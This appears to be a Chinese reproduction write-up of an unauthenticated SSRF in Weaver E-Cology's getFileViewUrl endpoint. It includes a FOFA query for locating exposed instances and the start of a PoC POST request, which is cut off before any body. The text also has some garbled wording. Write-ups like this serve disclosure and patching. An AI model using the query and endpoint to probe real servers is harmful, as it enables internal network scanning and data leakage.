泛微E-Cology getFileViewUrl SSRF漏洞复现

0x01 产品简介

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财政管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。
0x02 漏洞概述

泛微E-Cology getFileViewUrl 接口处存在服务器哀求伪造漏洞，未经身份验证的长途攻击者使用此漏洞扫描服务器所在的内网或本地端口，获取服务的banner信息，窥探网络结构，甚至对内网或本地运行的应用程序发起攻击，获取服务器内部敏感配置，造成信息泄露。
0x03 复现环境

FOFA：app="泛微-OA（e-cology）"

0x04 漏洞复现

PoC

1. POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1
2. Host: your-ip
3. User-Agent: M

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。